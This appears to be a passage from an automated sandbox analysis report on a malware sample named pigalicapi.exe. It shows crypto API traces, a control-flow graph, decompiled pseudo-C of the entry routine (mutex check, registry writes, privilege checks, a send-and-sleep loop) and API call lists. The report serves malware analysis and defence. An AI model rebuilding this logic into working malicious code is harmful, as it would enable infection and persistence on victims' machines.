                                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0400493C
                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0400496F
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04004982
                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 040049A9
                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 040049CC
                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 04004A07
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04004845
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0400481F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$AcquireContextCreateData$DecryptDeriveDestroyErrorLastParam
                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                          • API String ID: 2739279601-947817771
                                                                                                                                                                                                                                                                          • Opcode ID: 42090ebe0b84d1e6b92d05052a41d8df984fe46a239ada941c44efd33afc4f41
                                                                                                                                                                                                                                                                          • Instruction ID: 68028e15a08110d1318f396c41aabee13b9dff780772823a15a50aa733777c46
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42090ebe0b84d1e6b92d05052a41d8df984fe46a239ada941c44efd33afc4f41
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E71DF71A54318ABFB65CF50CC45BED77BCAB48B04F408598A605BA1C0DBB9ABC4CF54
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 650 4003b00-4003b5c call 4001000 call 4003130 call 4002ed0 GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize call 4004510 659 4003b62-4003c8c call 4007d20 call 4005700 call 4005a00 call 4007d20 call 4009400 call 40099f0 call 4006060 call 4005e00 StrStrIA call 4001120 call 4005e30 call 4006cf0 call 4005f30 call 4009b90 WSAStartup 650->659 660 400400a-400400c ExitProcess 650->660 659->660 687 4003c92-4003cb1 659->687 688 4003cc0-4003cc9 687->688 689 4003cb3-4003cbb 687->689 690 4003cda-4003ce3 688->690 691 4003ccb-4003cd4 688->691 689->688 692 4003cf4-4003cfd 690->692 693 4003ce5-4003cee 690->693 691->690 694 4003d0c-4003d15 692->694 695 4003cff-4003d07 692->695 693->692 696 4003d26-4003d2f 694->696 697 4003d17-4003d20 694->697 695->694 698 4003d40-4003dfd call 4007d20 call 400a700 call 400a4b0 call 4005b50 call 4008a70 696->698 699 4003d31-4003d3a 696->699 697->696 710 4003e49 698->710 711 4003dff-4003e3f call 4007d20 call 40078d0 698->711 699->698 712 4003e53-4003eab call 4007970 call 4004020 710->712 711->710 721 4003eb1-4003ed9 call 4004020 712->721 722 4003f8a 712->722 728 4003f81 721->728 729 4003edf-4003efa call 4004020 721->729 724 4003f91-4003f9a 722->724 726 4003f9c-4003fa3 724->726 727 4003fed-4003ffa Sleep 724->727 730 4003fd0-4003fd7 726->730 731 4003fa5-4003fac 726->731 727->712 733 4003f88 728->733 737 4003eff-4003f07 729->737 730->727 732 4003fd9-4003fe3 730->732 735 4003fc4 731->735 736 4003fae-4003fc2 731->736 732->727 733->724 738 4003fce 735->738 736->738 739 4003f78 737->739 740 4003f09-4003f50 call 40042e0 call 4004020 737->740 738->727 741 4003f7f 739->741 746 4003f52 740->746 747 4003f59-4003f60 740->747 741->733 746->747 748 4003f62-4003f70 VirtualFree 747->748 749 4003f76 747->749 748->749 749->741
                                                                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                                                                          			_entry_() {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				char _v1148;
                                                                                                                                                                                                                                                                          				signed char _v1149;
                                                                                                                                                                                                                                                                          				intOrPtr _v1156;
                                                                                                                                                                                                                                                                          				char _v1556;
                                                                                                                                                                                                                                                                          				char _v9556;
                                                                                                                                                                                                                                                                          				long _v9560;
                                                                                                                                                                                                                                                                          				char _v9564;
                                                                                                                                                                                                                                                                          				char _v12068;
                                                                                                                                                                                                                                                                          				signed int _v12072;
                                                                                                                                                                                                                                                                          				char _v12076;
                                                                                                                                                                                                                                                                          				long _v12080;
                                                                                                                                                                                                                                                                          				char _v12081;
                                                                                                                                                                                                                                                                          				long _v12088;
                                                                                                                                                                                                                                                                          				long _v12092;
                                                                                                                                                                                                                                                                          				long _v12096;
                                                                                                                                                                                                                                                                          				signed int _v12100;
                                                                                                                                                                                                                                                                          				signed char _v12101;
                                                                                                                                                                                                                                                                          				long _v12108;
                                                                                                                                                                                                                                                                          				signed int _v12112;
                                                                                                                                                                                                                                                                          				void* _v12116;
                                                                                                                                                                                                                                                                          				signed char _t69;
                                                                                                                                                                                                                                                                          				intOrPtr _t74;
                                                                                                                                                                                                                                                                          				signed char _t77;
                                                                                                                                                                                                                                                                          				signed char _t79;
                                                                                                                                                                                                                                                                          				signed int _t80;
                                                                                                                                                                                                                                                                          				signed char _t85;
                                                                                                                                                                                                                                                                          				signed char _t86;
                                                                                                                                                                                                                                                                          				signed char _t87;
                                                                                                                                                                                                                                                                          				intOrPtr _t88;
                                                                                                                                                                                                                                                                          				char* _t89;
                                                                                                                                                                                                                                                                          				signed int _t97;
                                                                                                                                                                                                                                                                          				void* _t98;
                                                                                                                                                                                                                                                                          				signed int _t100;
                                                                                                                                                                                                                                                                          				signed char _t102;
                                                                                                                                                                                                                                                                          				signed char _t104;
                                                                                                                                                                                                                                                                          				signed char _t106;
                                                                                                                                                                                                                                                                          				signed char _t110;
                                                                                                                                                                                                                                                                          				signed int _t116;
                                                                                                                                                                                                                                                                          				signed int _t118;
                                                                                                                                                                                                                                                                          				char _t125;
                                                                                                                                                                                                                                                                          				signed int _t138;
                                                                                                                                                                                                                                                                          				signed int _t140;
                                                                                                                                                                                                                                                                          				intOrPtr _t143;
                                                                                                                                                                                                                                                                          				signed int _t159;
                                                                                                                                                                                                                                                                          				signed int _t161;
                                                                                                                                                                                                                                                                          				void* _t163;
                                                                                                                                                                                                                                                                          				void* _t165;
                                                                                                                                                                                                                                                                          				void* _t173;
                                                                                                                                                                                                                                                                          				void* _t177;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				E04001000(0x2f50);
                                                                                                                                                                                                                                                                          				_v8 = E04003130();
                                                                                                                                                                                                                                                                          				E04002ED0(_v8);
                                                                                                                                                                                                                                                                          				GetModuleFileNameA(0, "C:\Users\engineer\pigalicapi.exe", 0x208);
                                                                                                                                                                                                                                                                          				SetUnhandledExceptionFilter(E04005DB0); // executed
                                                                                                                                                                                                                                                                          				__imp__CoInitialize(0); // executed
                                                                                                                                                                                                                                                                          				_t69 = E04004510(_v8, 0x4013c88); // executed
                                                                                                                                                                                                                                                                          				_t165 = _t163 + 0xc;
                                                                                                                                                                                                                                                                          				if((_t69 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          					L39:
                                                                                                                                                                                                                                                                          					ExitProcess(0);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				E04007D20( &_v1148,  &_v1148, 0, 0x46b);
                                                                                                                                                                                                                                                                          				E04005700( &_v1148); // executed
                                                                                                                                                                                                                                                                          				_t143 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          				_t74 = E04005A00( &_v1148, _t143, 0xff); // executed
                                                                                                                                                                                                                                                                          				_v1156 = _t74;
                                                                                                                                                                                                                                                                          				E04007D20(_t74, "Kobucgekyxca", 0, 0x12c);
                                                                                                                                                                                                                                                                          				E04009400( &_v1148, "Kobucgekyxca", 0xa); // executed
                                                                                                                                                                                                                                                                          				_t77 = E040099F0(); // executed
                                                                                                                                                                                                                                                                          				 *0x401435a = _t77;
                                                                                                                                                                                                                                                                          				 *0x401435d = E04006060(); // executed
                                                                                                                                                                                                                                                                          				_t79 = E04005E00(); // executed
                                                                                                                                                                                                                                                                          				 *0x401435e = _t79;
                                                                                                                                                                                                                                                                          				_t80 = StrStrIA("C:\Users\engineer\pigalicapi.exe", "svchost.exe"); // executed
                                                                                                                                                                                                                                                                          				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                          				 *0x4014362 =  ~( ~_t80);
                                                                                                                                                                                                                                                                          				E04001120("C:\Users\engineer\pigalicapi.exe", "pigalicapi",  *0x401435a & 0x000000ff,  *0x4014362 & 0x000000ff, 0x401436c); // executed
                                                                                                                                                                                                                                                                          				_t85 = E04005E30(0); // executed
                                                                                                                                                                                                                                                                          				 *0x401435b = _t85;
                                                                                                                                                                                                                                                                          				 *0x401435f = 1; // executed
                                                                                                                                                                                                                                                                          				_t86 = E04006CF0(); // executed
                                                                                                                                                                                                                                                                          				_v1149 = _t86;
                                                                                                                                                                                                                                                                          				_t87 = E04005F30(); // executed
                                                                                                                                                                                                                                                                          				 *0x401435c = _t87 & 0x000000ff | _v1149 & 0x000000ff;
                                                                                                                                                                                                                                                                          				_t88 = E04009B90(0xffffffff);
                                                                                                                                                                                                                                                                          				_t173 = _t165 + 0x50;
                                                                                                                                                                                                                                                                          				 *0x4014364 = _t88;
                                                                                                                                                                                                                                                                          				_t89 =  &_v1556;
                                                                                                                                                                                                                                                                          				_push(_t89);
                                                                                                                                                                                                                                                                          				_push(0x202); // executed
                                                                                                                                                                                                                                                                          				L0400B1E6(); // executed
                                                                                                                                                                                                                                                                          				if(_t89 != 0) {
                                                                                                                                                                                                                                                                          					goto L39;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_t125 =  *0x40119a8; // 0x1d
                                                                                                                                                                                                                                                                          					_v12081 = _t125;
                                                                                                                                                                                                                                                                          					 *0x4014378 = 0x10;
                                                                                                                                                                                                                                                                          					if(( *0x401435f & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_t118 =  *0x4014378; // 0x1b
                                                                                                                                                                                                                                                                          						 *0x4014378 = _t118 | 0x00000008;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(( *0x401435c & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_t161 =  *0x4014378; // 0x1b
                                                                                                                                                                                                                                                                          						 *0x4014378 = _t161 | 0x00000001;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(( *0x401435b & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_t140 =  *0x4014378; // 0x1b
                                                                                                                                                                                                                                                                          						 *0x4014378 = _t140 | 0x00000004;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(( *0x401435e & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_t116 =  *0x4014378; // 0x1b
                                                                                                                                                                                                                                                                          						 *0x4014378 = _t116 | 0x00000002;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(( *0x4014360 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_t159 =  *0x4014378; // 0x1b
                                                                                                                                                                                                                                                                          						 *0x4014378 = _t159 | 0x00000020;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t91 =  *0x4014361 & 0x000000ff;
                                                                                                                                                                                                                                                                          					if(( *0x4014361 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_t138 =  *0x4014378; // 0x1b
                                                                                                                                                                                                                                                                          						 *0x4014378 = _t138 | 0x00000040;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v9564 = 0x9c3;
                                                                                                                                                                                                                                                                          					E04007D20(_t91,  &_v12068, 0, 0x9c4);
                                                                                                                                                                                                                                                                          					E0400A700();
                                                                                                                                                                                                                                                                          					E0400A4B0( &_v12068,  &_v9564, 0x4013cb6,  *0x4013cb4 & 0x0000ffff);
                                                                                                                                                                                                                                                                          					_v9560 = 0;
                                                                                                                                                                                                                                                                          					_t97 = E04005B50( &_v12068, ";",  &_v9560, 0); // executed
                                                                                                                                                                                                                                                                          					_v12072 = _t97;
                                                                                                                                                                                                                                                                          					_v12092 = 0;
                                                                                                                                                                                                                                                                          					_v12080 = 0;
                                                                                                                                                                                                                                                                          					_v12076 = 0x4b0;
                                                                                                                                                                                                                                                                          					_t98 = E04008A70(0x4012c34,  &_v12076, 0x4012ba8, 0x8c, 0x400e008, 0x254); // executed
                                                                                                                                                                                                                                                                          					_t177 = _t173 + 0x44;
                                                                                                                                                                                                                                                                          					if(_t98 != 0) {
                                                                                                                                                                                                                                                                          						E04007D20( &_v9556,  &_v9556, 0, 0x1f40);
                                                                                                                                                                                                                                                                          						E040078D0(0x4012c34, 0xc8,  &_v9556, 0xc8);
                                                                                                                                                                                                                                                                          						_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                          						_v12092 =  &_v9556;
                                                                                                                                                                                                                                                                          						_v12080 = 0xc8;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v12088 = 0;
                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                          					_v12101 = 0;
                                                                                                                                                                                                                                                                          					_v12108 = 0x1d4c0;
                                                                                                                                                                                                                                                                          					_v12096 = 0;
                                                                                                                                                                                                                                                                          					_t100 = E04007970( &_v12096); // executed
                                                                                                                                                                                                                                                                          					_v12100 = _t100;
                                                                                                                                                                                                                                                                          					_t102 = E04004020(_v12096, _v12100,  &_v1148, 1, 2, 0);
                                                                                                                                                                                                                                                                          					_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                          					if((_t102 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_v12101 = 1;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_t104 = E04004020(_v12092, _v12080,  &_v1148, 1, 5, 0);
                                                                                                                                                                                                                                                                          						_t177 = _t177 + 0x18;
                                                                                                                                                                                                                                                                          						if((_t104 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          							_v12101 = 1;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_t106 = E04004020(_v9560, _v12072,  &_v1148, 3, 0xa, 1); // executed
                                                                                                                                                                                                                                                                          							_t177 = _t177 + 0x18;
                                                                                                                                                                                                                                                                          							if((_t106 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          								_v12101 = 1;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v12116 = 0;
                                                                                                                                                                                                                                                                          								_v12112 = E040042E0( &_v12116);
                                                                                                                                                                                                                                                                          								_t110 = E04004020(_v12116, _v12112,  &_v1148, 1, 0x17, 0);
                                                                                                                                                                                                                                                                          								_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                          								if((_t110 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          									_v12101 = 1;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								if(_v12116 != 0) {
                                                                                                                                                                                                                                                                          									VirtualFree(_v12116, 0, 0x8000);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if((_v12101 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						if( *0x40118a4 != 1) {
                                                                                                                                                                                                                                                                          							if( *0x40118a4 == 2) {
                                                                                                                                                                                                                                                                          								 *0x40118a4 = 1;
                                                                                                                                                                                                                                                                          								_v12108 = 0x1499700;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							if( *0x40130e4 != 2) {
                                                                                                                                                                                                                                                                          								_v12108 = 0x1499700;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v12108 = 0x3e8;
                                                                                                                                                                                                                                                                          								 *0x40118a4 = 2;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					Sleep(_v12108); // executed
                                                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}





















































                                                                                                                                                                                                                                                                          0x04003b08
                                                                                                                                                                                                                                                                          0x04003b12
                                                                                                                                                                                                                                                                          0x04003b19
                                                                                                                                                                                                                                                                          0x04003b2d
                                                                                                                                                                                                                                                                          0x04003b38
                                                                                                                                                                                                                                                                          0x04003b40
                                                                                                                                                                                                                                                                          0x04003b4f
                                                                                                                                                                                                                                                                          0x04003b54
                                                                                                                                                                                                                                                                          0x04003b5c
                                                                                                                                                                                                                                                                          0x0400400a
                                                                                                                                                                                                                                                                          0x0400400c
                                                                                                                                                                                                                                                                          0x0400400c
                                                                                                                                                                                                                                                                          0x04003b70
                                                                                                                                                                                                                                                                          0x04003b7f
                                                                                                                                                                                                                                                                          0x04003b8c
                                                                                                                                                                                                                                                                          0x04003b9a
                                                                                                                                                                                                                                                                          0x04003ba2
                                                                                                                                                                                                                                                                          0x04003bb4
                                                                                                                                                                                                                                                                          0x04003bca
                                                                                                                                                                                                                                                                          0x04003bd2
                                                                                                                                                                                                                                                                          0x04003bd7
                                                                                                                                                                                                                                                                          0x04003be1
                                                                                                                                                                                                                                                                          0x04003be6
                                                                                                                                                                                                                                                                          0x04003beb
                                                                                                                                                                                                                                                                          0x04003bfa
                                                                                                                                                                                                                                                                          0x04003c02
                                                                                                                                                                                                                                                                          0x04003c06
                                                                                                                                                                                                                                                                          0x04003c2a
                                                                                                                                                                                                                                                                          0x04003c34
                                                                                                                                                                                                                                                                          0x04003c3c
                                                                                                                                                                                                                                                                          0x04003c41
                                                                                                                                                                                                                                                                          0x04003c48
                                                                                                                                                                                                                                                                          0x04003c4d
                                                                                                                                                                                                                                                                          0x04003c53
                                                                                                                                                                                                                                                                          0x04003c64
                                                                                                                                                                                                                                                                          0x04003c6c
                                                                                                                                                                                                                                                                          0x04003c71
                                                                                                                                                                                                                                                                          0x04003c74
                                                                                                                                                                                                                                                                          0x04003c79
                                                                                                                                                                                                                                                                          0x04003c7f
                                                                                                                                                                                                                                                                          0x04003c80
                                                                                                                                                                                                                                                                          0x04003c85
                                                                                                                                                                                                                                                                          0x04003c8c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04003c92
                                                                                                                                                                                                                                                                          0x04003c92
                                                                                                                                                                                                                                                                          0x04003c98
                                                                                                                                                                                                                                                                          0x04003c9e
                                                                                                                                                                                                                                                                          0x04003cb1
                                                                                                                                                                                                                                                                          0x04003cb3
                                                                                                                                                                                                                                                                          0x04003cbb
                                                                                                                                                                                                                                                                          0x04003cbb
                                                                                                                                                                                                                                                                          0x04003cc9
                                                                                                                                                                                                                                                                          0x04003ccb
                                                                                                                                                                                                                                                                          0x04003cd4
                                                                                                                                                                                                                                                                          0x04003cd4
                                                                                                                                                                                                                                                                          0x04003ce3
                                                                                                                                                                                                                                                                          0x04003ce5
                                                                                                                                                                                                                                                                          0x04003cee
                                                                                                                                                                                                                                                                          0x04003cee
                                                                                                                                                                                                                                                                          0x04003cfd
                                                                                                                                                                                                                                                                          0x04003cff
                                                                                                                                                                                                                                                                          0x04003d07
                                                                                                                                                                                                                                                                          0x04003d07
                                                                                                                                                                                                                                                                          0x04003d15
                                                                                                                                                                                                                                                                          0x04003d17
                                                                                                                                                                                                                                                                          0x04003d20
                                                                                                                                                                                                                                                                          0x04003d20
                                                                                                                                                                                                                                                                          0x04003d26
                                                                                                                                                                                                                                                                          0x04003d2f
                                                                                                                                                                                                                                                                          0x04003d31
                                                                                                                                                                                                                                                                          0x04003d3a
                                                                                                                                                                                                                                                                          0x04003d3a
                                                                                                                                                                                                                                                                          0x04003d40
                                                                                                                                                                                                                                                                          0x04003d58
                                                                                                                                                                                                                                                                          0x04003d60
                                                                                                                                                                                                                                                                          0x04003d80
                                                                                                                                                                                                                                                                          0x04003d88
                                                                                                                                                                                                                                                                          0x04003da7
                                                                                                                                                                                                                                                                          0x04003daf
                                                                                                                                                                                                                                                                          0x04003db5
                                                                                                                                                                                                                                                                          0x04003dbf
                                                                                                                                                                                                                                                                          0x04003dc9
                                                                                                                                                                                                                                                                          0x04003df3
                                                                                                                                                                                                                                                                          0x04003df8
                                                                                                                                                                                                                                                                          0x04003dfd
                                                                                                                                                                                                                                                                          0x04003e0d
                                                                                                                                                                                                                                                                          0x04003e2b
                                                                                                                                                                                                                                                                          0x04003e30
                                                                                                                                                                                                                                                                          0x04003e39
                                                                                                                                                                                                                                                                          0x04003e3f
                                                                                                                                                                                                                                                                          0x04003e3f
                                                                                                                                                                                                                                                                          0x04003e49
                                                                                                                                                                                                                                                                          0x04003e53
                                                                                                                                                                                                                                                                          0x04003e53
                                                                                                                                                                                                                                                                          0x04003e5a
                                                                                                                                                                                                                                                                          0x04003e64
                                                                                                                                                                                                                                                                          0x04003e75
                                                                                                                                                                                                                                                                          0x04003e7d
                                                                                                                                                                                                                                                                          0x04003e9e
                                                                                                                                                                                                                                                                          0x04003ea3
                                                                                                                                                                                                                                                                          0x04003eab
                                                                                                                                                                                                                                                                          0x04003f8a
                                                                                                                                                                                                                                                                          0x04003eb1
                                                                                                                                                                                                                                                                          0x04003ecc
                                                                                                                                                                                                                                                                          0x04003ed1
                                                                                                                                                                                                                                                                          0x04003ed9
                                                                                                                                                                                                                                                                          0x04003f81
                                                                                                                                                                                                                                                                          0x04003edf
                                                                                                                                                                                                                                                                          0x04003efa
                                                                                                                                                                                                                                                                          0x04003eff
                                                                                                                                                                                                                                                                          0x04003f07
                                                                                                                                                                                                                                                                          0x04003f78
                                                                                                                                                                                                                                                                          0x04003f09
                                                                                                                                                                                                                                                                          0x04003f09
                                                                                                                                                                                                                                                                          0x04003f22
                                                                                                                                                                                                                                                                          0x04003f43
                                                                                                                                                                                                                                                                          0x04003f48
                                                                                                                                                                                                                                                                          0x04003f50
                                                                                                                                                                                                                                                                          0x04003f52
                                                                                                                                                                                                                                                                          0x04003f52
                                                                                                                                                                                                                                                                          0x04003f60
                                                                                                                                                                                                                                                                          0x04003f70
                                                                                                                                                                                                                                                                          0x04003f70
                                                                                                                                                                                                                                                                          0x04003f76
                                                                                                                                                                                                                                                                          0x04003f7f
                                                                                                                                                                                                                                                                          0x04003f88
                                                                                                                                                                                                                                                                          0x04003f9a
                                                                                                                                                                                                                                                                          0x04003fa3
                                                                                                                                                                                                                                                                          0x04003fd7
                                                                                                                                                                                                                                                                          0x04003fd9
                                                                                                                                                                                                                                                                          0x04003fe3
                                                                                                                                                                                                                                                                          0x04003fe3
                                                                                                                                                                                                                                                                          0x04003fa5
                                                                                                                                                                                                                                                                          0x04003fac
                                                                                                                                                                                                                                                                          0x04003fc4
                                                                                                                                                                                                                                                                          0x04003fae
                                                                                                                                                                                                                                                                          0x04003fae
                                                                                                                                                                                                                                                                          0x04003fb8
                                                                                                                                                                                                                                                                          0x04003fb8
                                                                                                                                                                                                                                                                          0x04003fce
                                                                                                                                                                                                                                                                          0x04003fa3
                                                                                                                                                                                                                                                                          0x04003ff4
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04003ff4

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\pigalicapi.exe,00000208), ref: 04003B2D
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(04005DB0), ref: 04003B38
                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04003B40
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 0400456C
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0400458B
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: GetFileSize.KERNEL32(000000FF,00000000), ref: 040045AD
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040045D6
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04004617
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0400463E
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040047C0
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: CloseHandle.KERNEL32(00000000), ref: 040047E0
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0400400C
                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 04005742
                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 040057B8
                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 040057F1
                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: wnsprintfA.SHLWAPI ref: 0400582F
                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005854
                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: GetFileSize.KERNEL32(000000FF,00000000), ref: 0400586D
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrcpyA.KERNEL32(Sscculmqcxgnq,WDefault), ref: 04005A47
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrlenA.KERNEL32(0400C4E0), ref: 04005A7D
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrcpyA.KERNEL32(00000000,0400C4E0), ref: 04005A97
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrlenA.KERNEL32(00000000), ref: 04005AA1
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrlenA.KERNEL32(Sscculmqcxgnq), ref: 04005AAE
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrcatA.KERNEL32(00000000,Sscculmqcxgnq), ref: 04005AC8
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 04005B00
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: RegCloseKey.KERNEL32(00000000), ref: 04005B0E
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrlenA.KERNEL32(00000000), ref: 04005B3B
                                                                                                                                                                                                                                                                            • Part of subcall function 04009400: lstrcpyA.KERNEL32(?,00000000), ref: 04009513
                                                                                                                                                                                                                                                                            • Part of subcall function 04009400: CharUpperA.USER32(?), ref: 04009521
                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: GetCurrentProcess.KERNEL32(00000008,?), ref: 04009A0A
                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: OpenProcessToken.ADVAPI32(00000000), ref: 04009A11
                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 04009A3A
                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 04009A77
                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 04009AAD
                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: EqualSid.ADVAPI32(?,00000000), ref: 04009AC3
                                                                                                                                                                                                                                                                            • Part of subcall function 04006060: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 04006082
                                                                                                                                                                                                                                                                            • Part of subcall function 04005E00: CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,04003BEB), ref: 04005E0C
                                                                                                                                                                                                                                                                            • Part of subcall function 04005E00: GetLastError.KERNEL32(?,04003BEB), ref: 04005E12
                                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(C:\Users\user\pigalicapi.exe,svchost.exe), ref: 04003BFA
